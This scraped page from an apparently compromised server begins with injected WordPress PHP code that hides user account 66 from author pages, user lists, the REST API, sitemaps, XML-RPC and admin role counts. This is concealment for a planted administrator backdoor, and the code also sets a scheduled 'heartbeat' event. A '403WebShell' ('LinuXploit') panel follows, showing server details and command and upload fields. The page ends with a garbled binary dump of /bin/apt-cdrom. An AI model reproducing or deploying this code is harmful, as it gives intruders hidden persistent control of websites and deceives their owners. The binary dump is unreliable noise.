add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /bin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /bin/apt-cdrom
ELF�#@@8	@@@@��888uEuE�����x�x�x�PPTTTDDP�tdp?p?p?��Q�tdR�td���88/lib/ld-linux-aarch64.so.1GNUr��Ω�׳�p~�P�щ��GNUGG{�����8��1gn?�<�����"P��ps�y(
��(�M��>��U�U d�q�"�)(�U�[ _�.0��9w � 
�`?
__libc_start_main__cxa_finalizeabortdgettextstrlenmemcpy__stack_chk_failreadmkdir_ITM_deregisterTMCloneTable__gmon_start___ITM_registerTMCloneTable_Z16ParseCommandLineR11CommandLine7APT_CMDPKP13ConfigurationPP9pkgSystemiPPKcPFbS0_EPFSt6vectorI19aptDispatchWithHelpSaISF_EEvE_Z19DispatchCommandLineR11CommandLineRKSt6vectorINS_8DispatchESaIS2_EE_Z10InitOutputPSt15basic_streambufIcSt11char_traitsIcEE_ZTS10OpProgress_ZTV14OpTextProgress_ZNK13Configuration7FindDirB5cxx11EPKcS1__ZN14OpTextProgress4DoneEv_ZN8pkgCdrom5IdentERNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEP14pkgCdromStatus_Z10MountCdromNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES4__Z12UnmountCdromNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE_ZN11CommandLineD1Ev_ZN13Configuration3SetEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE_ZN11GlobalError7WarningEPKcz_ZN14pkgCdromStatusD2Ev_ZN19pkgUdevCdromDevicesD1Ev_ZTI14pkgCdromStatus_ZN11CommandLineC1Ev_ZNK13Configuration4FindB5cxx11EPKcS1__ZN14pkgCdromStatusC2Ev_ZN19pkgUdevCdromDevicesC1Ev_Z10FileExistsNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE_config_ZN11GlobalError5ErrorEPKcz_ZN19pkgUdevCdromDevices4ScanEv_ZN8pkgCdrom3AddEP14pkgCdromStatus_ZNK13Configuration5FindBEPKcRKb_ZN8pkgCdromD1Ev_ZN13Configuration3SetEPKcRKi_ZN10OpProgressC2Ev_ZN8pkgCdromC1Ev_ZN11GlobalError14MergeWithStackEv_Z12_GetErrorObjv_ZN11GlobalError11PushToStackEv_ZN11GlobalError5ErrnoEPKcS1_z_system_ZNSo9_M_insertIbEERSoT__ZNSt9basic_iosIcSt11char_traitsIcEE5clearESt12_Ios_Iostate_ZSt4clog_ZdlPvm_ZSt3cin_ZSt7getlineIcSt11char_traitsIcESaIcEERSt13basic_istreamIT_T0_ES7_RNSt7__cxx1112basic_stringIS4_S5_T1_EES4__ZTVN10__cxxabiv117__class_type_infoE_ZTVN10__cxxabiv120__si_class_type_infoE_ZSt16__throw_bad_castv_ZSt21ios_base_library_initv__gxx_personality_v0_ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_l_ZNSo3putEc_ZNKSt5ctypeIcE13_M_widen_initEv_ZNSo5flushEv_Znwm_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE9_M_createERmm_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE10_M_disposeEv_ZSt4cout_Unwind_Resume__gcc_personality_v0__stack_chk_guardlibapt-private.so.0.0libapt-pkg.so.6.0libstdc++.so.6libgcc_s.so.1libc.so.6ld-linux-aarch64.so.1GLIBC_2.17GCC_3.0GCC_3.3.1APTPRIVATE_0.0GLIBC_2.34APTPKG_6.0GLIBCXX_3.4.32GLIBCXX_3.4.21GLIBCXX_3.4.11GLIBCXX_3.4.9CXXABI_1.3.9CXXABI_1.3GLIBCXX_3.4	



� �����0P&y	a_&	
	� �I 	�0���	&	����� �N�1	�B��<	q��
K	a��Z	�)i	yѯ
w	ӯk�	t)��	�$��#�h��@$�@$���$�@%�P��, ��,(� $0�0&8�@*@�p&H�`$X�H?p�`?���!?�: ?( ?0�:8(?P�,`�Ah���
������!�+�3�4�<�@�D��EX`7��������	� �(�
0�8�@�H�P�X�`�h�p�x��������������� ��"��#�$�%�&�'�(�)��*�-�.�/�0 �1(�50�68�7@�8H�9P�:X�;`�=h�>p�?x�B��C��D��F �{����D��{���_��{�����F�b7� � � � ����F��7� ����F��7� ����F��7� ����F��7� ���G�8� ���G�"8� ���
G�B8� ���G�b8� ���G��8� ���G��8� ���G��8� ���G��8� ���"G�9� ���&G�"9� ���*G�B9� ���.G�b9� ���2G��9� ���6G��9� ���:G��9� ���>G��9� ���BG�:� ���FG�":� ���JG�B:� ���NG�b:� ���RG��:� ���VG��:� ���ZG��:� ���^G��:� ���bG�;� ���fG�";� ���jG�B;� ���nG�b;� ���rG��;� ���vG��;� ���zG��;� ���~G��;� ����G�<� ����G�"<� ����G�B<� ����G�b<� ����G��<� ����G��<� ����G��<� ����G��<� ����G�=� ����G�"=� ����G�B=� ����G�b=� ����G��=� ����G��=� ����G��=� ����G��=� ����G�>� ����G�">� ����G�B>� �?#�����B�G��{����S����#��[��*��@@�������������c�G����B�G�����*�����7��&�a�R�������G�x@�������������*��4<����1������G��@�@�B���T�{D��*�SE��[F�����#�_֟$�����������������G��@�@�B��ҠT�����$���������� � � ��������@��#������G��������l������G�@�����_� � �������!��?�T��!�G�a����_�������!��!�"��A��!�A�����B�G�b����_� �?#�{��������`�A9@7���G�����@������� �R`�9�@��{¨�#�_�_$��� � �?#�{������{���#�_� �?#�{�����{���#�_� � �?#�{��`����{���#�_� �?#�{��������!`+���!@�A
�����P@��TA@�!����`B@�aB��TaJ@�!����`2@�a���Ta:@�!����`"@�aB�s���Ta
@��@�!��{¨�#շ���@��{¨�#�_� � �?#�{��������!`+���!@�A
�����P@��TA@�!�����`B@�aB��TaJ@�!�����`2@�a���Ta:@�!�����`"@�aB��Ta*@�!����������@��{¨�#Յ��?#�{������@����{���#�A@�!�z���{���#�_� � �_$�"@�B��_�?#�{�����G���!@�~����{���#�C�� � �?#������G��{�����S�����[�!`,��3�@�������-�G�������������������G����G�]������G�"������G����!@8�T����@�A�R�9�^����
@�`	����G���"��H������@��^���x@�����@9�4�A9����������c���!�G�����c9 @��^��x@�����@9�4�A9���G��#�����G���x������@� A��T�	T�@�c
�c
@�a
�`�������9�@��T�@�!��������G��@�@�B���T�{C� �R�SD��[E��3@�����#�_����G�����G�~�������������@�A�R��B@�@?��������G��#�����@���"@�A�R@?��������G��@��^��� @�!2�������T�@�c
�`
����c��������_� T��Y���`@��@�b�h"8�@�����c@99`@��@�������G��@�@�B��ҁT�������G��@��@���ҁT�#������$����������@��@����@TK�������?#�{������!�-��-�����������1��������G��������@� �R�{¨�#�_���!�G� @��^�� @�!2�����{¨�#� �R�_� � �?#�����B�G���{��C��!`1��S��-�C@�����V��� ������������s�G����G�l���`@��R�9�^�`�@������G�����"��_���&�����"���R�������@9(q�T���G��@�@�B��ҁT�{A� �R�SB�����#�_����G���������G��`@��^�s�sz@�s�`�@94aA9���G������������s�G�`@��^�`� @�!2a��������.���b@�A�R��B@�@?�����B@2�! 3��������������G��@�@�B���!��T��� � �?#�{����!�G����S������b+�!@�B���a�O���`r@�a���Taz@�!���`^@��b+��B�a"�t��Taf@�!����`N@�a���TaV@�!����`>@�a"��TaF@�!����`.@�a���Ta6@�!�������SA��{¨�#լ��?#�{����!�G����S������b+�!@�B���a����`r@�a���Taz@�!�����`^@��b+��B�a"�t��Taf@�!�����`N@�a���TaV@�!�����`>@�a"��TaF@�!�����`.@�a���Ta6@�!�������v�����"���SA��{¨�#Ո��?#�����!@����G��{��C�"@��S��� A�@��'���! @�}���	�	��b�`�a"�l���b@� �`A��
���!�G��
�c"@� ������'@�@�B���T�{E����SF�����#�_֟$Ղ@����
@�!�b���Q������G��'@�@�B���@T���������� � �?#����c�G��{��C��S�S�������a@�������>�(T@��T�@99�@��@�����!�G�h38�@�"@���ҡT�{A��SB��@����#�_�3�������q������@��
����������@��@����� � �?#�{�����[��k��s��	�����!�G�����"@�����������������?���c+���!������;�4�����!�G��c������!@����������c9�Sy����������G�#�R�!�3��C9�@��+��C��/��������6�@����! 4��C9�������@����!�4��/������@����!�4��C9�������'6�@�������I��;T���G��!@5��������5����+��@��*5�c9�c�`�@9����%7�@��5�@��#�����#�!�6������P��c��g@�?�5T�@���3T���o@��o��3��������9�@��T�@�!������L��#�����"�<���������@�_�T�@���!�v����/6�L�������#����w�"�)���b@�����a@�"�#����@��������@�_�T�@���!�\����@��w@��T�@�!�U���u(7�#�6�������!�6��-�@���b@����g@��������g@��T�o@�!�A����O@�s"��!�T�@��@�!'4�@���/@�!�4�a����SI��T �`@�a���Ta@�!�*����� A��Ta
@�!�#���s"�����T�K@����S@���!�����W@�����T�_@�!�����@��"7�����|
6�������������6��!`7��-��������$����������G��������s�G�`@��^�s�sz@��(�`�@9�!4aA9���G��������3�R�����@�c+�B���@����@�A����@��A��T�A�!������@�c+�C��������T�@�!������@��C��T��@�!������@�����T��@�!������@��C��T��@�!������������@�O������G��A�@�B���AT�/A��*�+A��;A��?A��	��[B��kD��sE��{ƨ�#�_�#��c����������c9�����@�_�T�@���!�����w���������7t�������!`8��-�~������!<���u����R����@�#�R���!�4���������@���#�b��!�4������#�W�������	6����2������#�N���q����L�"��#��c�"����������K����@���T�@�!�Y������SD�B����h����+@������d���a
@���a��������5�"��\������!6����W���a�@9��|�������5�"��P������!@6����K���a�B���H�����5���"��D����@��^���x@�����@9�4�A9���������z���#��c����������c9����@���_��T�@���!��������@��#����!�4�8��������!����@���A�RB@�@?������!�4��o�i�������7���g@�=�R���������o����c���c����_�T�������g@��@��k�h"8�@�X��������b@���A�RB@�@?���������s�G�`@��^�`� @�!2������cD99�g@��@���$����/@��������������;A��?A��@�X������G��A�@�B���;��?��Tj������G��A�@�B���!��T������G��A�@�B���!��T����$����@��#������������WI��� T�@�����T�@�!������� A��T�"���$��+������/�q����;A��?A����$��+����/�����$��+����/����������$�������������$������������$������$����#����������$��WI������$����$�������$���K@��S@�!���W�������
@��"�!�R������?#�{�� �R���{���#�>�� �?#�{���R���{���#�6�� �{�����{���_�Please provide a name for this Disc, such as 'Debian 5.0.3 Disk 1'aptUsage: apt-cdrom [options] command

apt-cdrom is used to add CDROM's, USB flashdrives and other removable
media types as package sources to APT. The mount point and device
information is taken from apt.conf(5), udev(7) and fstab(5).
Please insert a Disc in the drive and press [Enter]Failed to read from standard input (not a terminal?)pkgCdromTextStatus::PromptAcquire::cdrom::AutoDetectDebug::Acquire::cdromAcquire::cdrom::mountAPT::CDROM::NoMountLooking at device:	DeviveName: ''	IsMounted: '	MountPoint: 'Dir::Media::MountPathFailed to mount '%s' to '%s'Repeat this process for the rest of the CDs in your set.No CD-ROM could be auto-detected or found using the default mount point.
You may try the --cdrom option to set the CD-ROM mount point.
See 'man apt-cdrom' for more information about the CD-ROM auto-detection and mount point.%saddAdd a CDROMidentReport the identity of a CDROM18pkgCdromTextStatus10OpProgress;�P���������P���@��X��|������������H��@�������D��pt�����`�4P����p����zRx��4A,��0@�<$T0�PA-A ��B�N���A-|X� �P�A-A��C��A- �L�A-A��B��A- �H�A-A��C��A-,D��A-A ��E�a
���A-AB���A-$0���A-A ��E�c���A-(X\�8A-A��E
��A-CA��A- �p�8E-A��F��A-zPLRx�i�8 p�@oA-ApC��B��E���h
�������A-A4t��A-A ��H�H�B��A-A ��-I��A-(8���A-A0D��D��p
����A-AzPLRx���( T���A-A ��D��q����A-(L���A-A ��D��t����A-,4���A-ApE��C��c
����A-A,���A-A@C��B��C�[
�����A-A4�L��8<A-ApC��B��C��n
������A-A�$��
A-A`��E�������N�G�W�
B�	)
�B�A�A�A`D��������A-A��A�I�A�i��B
�
C�	B�A�AB�
B�	A����B�
B�	A�� �����A-A��C��A- ����A-A��C��A-��'l����$�������������
\����@x�������DL�p����@����t����������0���������<����T��
��
�������4��H������$�#h�@$@$�$@%P�,�, $0&@*p&`$H?`?������
�:�����o��	�
�	�(��	���o���o����o�oF���o0000000000000000000000000000000000000000000000000000000x��!?�:? ?�:(?/usr/lib/debug/.dwz/aarch64-linux-gnu/apt.debug|�d��]^�
�ޑ�mT991efa13cea9ffd7b3e5707e8c50b1d189afbc.debug�sb�.shstrtab.interp.note.gnu.build-id.note.ABI-tag.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.text.fini.rodata.eh_frame_hdr.eh_frame.gcc_except_table.init_array.fini_array.data.rel.ro.dynamic.got.data.bss.gnu_debugaltlink.gnu_debuglink88TT$&xx 4���o��$>���F�	�	�	N���oFF�[���o��@j�tB��(~y00���!�!<@��:�:�;;]�p?p?��8@8@@�xDxD������������x�x�P���8�h�hhhD�4�!

Youez - 2016 - github.com/yon3zu
LinuXploit